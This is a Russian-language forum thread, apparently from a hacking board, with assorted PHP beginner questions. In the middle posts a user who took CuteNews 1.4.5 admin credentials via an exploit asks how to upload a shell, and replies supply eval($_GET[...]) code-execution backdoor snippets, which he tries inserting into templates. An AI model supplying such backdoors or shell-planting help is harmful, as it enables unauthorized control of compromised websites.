А ты с бесплатного хостинга запускаешь или на своей тачке или на своем хостинге... ? Просто на бесплатных в большинстве сокеты не поддерживаются) Что-то вроде не могу найти ошибку... А сам писал регер или по аналогии с другими делал?
инересная ситуация с ПХП. $str1='true'; $str2='asdfasdf asdf'; if ($str1==$str2) ... все знают что вернет условие ФАЛСЕ, если же написать $str1=true; (без кавычек), но вернет ТРУЕ. Это тоже надеюсь все знают. Но такой момент, при передаче скрипту ГЕТ или других параметров со значением ТРУЕ ПХП интерпритирует значение ТРУЕ как строку, тоесть типа так $str1='true'; А как можна передать (если вообще можна) параметры, чтобы интерпритировало как логическое значение типа так $str1=true.
неа, 1,0,труе,фалсе, большими буквами, маленькими, ничего не пододит, поэтому и обратился. Может как-то можна обойти это. Например черезразные хеши переменных, может как-то они по другому пишутся. Тоесть по сути ТРУЕ и ФАЛСЕ где-то определены как константы, но кто-его знает...
Всем участникам приветы! хотел вот спросить ибо уже сломал се моск.... =( по моему вопросу в одной из тем мне посоветовали "Eval'лить код или поставь форму на закачку шела". Ушел в статьи и на php.ru (прошла неделя - голова как воздушный шарик) Тоесть как я понял в eval можно загнать пхп код - смысл етого я не пойму? На примере cutenews 1.4.5 на котором через эксплойт дабыл логин пароль админа - в теплейтах нельзя исполнлить пхп код, он его не воспринимает и не выводит (заметил что если вставить пхп код то после повторного просмотра долбаный кут ньюз удаляет из кода все введене переменые) Вот как бы и сам вопрос: объяснити для чего нужен етот eval, как и пользоваться и если есть желание помочь опишите, как мне залить шел в cutenews 1.4.5 имея админские привелегии?
presidentua, PHP: <?php eval($_GET['xek']); $str2='asdfasdf asdf'; if ($str1 == $str2) echo 1; ?> Естественно это не безопасно index.php?xek=$str1=true;
6u4yxa, пример PHP: <?php eval($_GET['sekas']); ?> Обратись к скрипту так: script.php?sekas=phpinfo();
после того как занес ето в теплейт вылезло вот ето Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING
про евал уже все что можно прочитал но не могу все равно понять зачем он нужен... А на счет теплейта как реализовать php код там? _____________________ попробовал тот код из примера работает =) выводит phpinfo(); но яж могу и без всякого eval его вывести. _____________________ прошло ещё 10 мин... вставил в темплейт вот так: <? eval($GET['sekas']); ?> вылезла ошибка... посидел, подумал.. вставил в темплейт вот так: <? eval(\"$GET['sekas']\"\); ?> смотрю ошибки нету... (думаю получилось)... пробую... http://localhost/cute/show_news.php?sekas=phpinfo(); ........(мат) просто отобразил последние новости без phpinfo(); - в чем загвостка?
Доброго времени суток)) Очень срочно надо научиться пользоваться скриптами!!! НАУЧИТЕ ПЛИЗЬЬЬ!!! Пишите как для чайника!!! Я новичёк!
работа в гугле тебе поможет так и пиши "как пользоваться скриптами" или там работа с php скриптами. читай маны и все поймешь
плиз тыкни носом я просто с оченннннь отдаленого города и у нас инет просто ДЕБИЛ в плане тормаза и траф дороговатый =) да и страниц тут уже 260 =) ____________ дошел до 245 не че не нашел то, что мне помогло бы =(((
парюсь с zend framework создал форму Zend_Form, делаю isValid() и он возвращает либо тру, либо фальс. А как получить текст ошибок?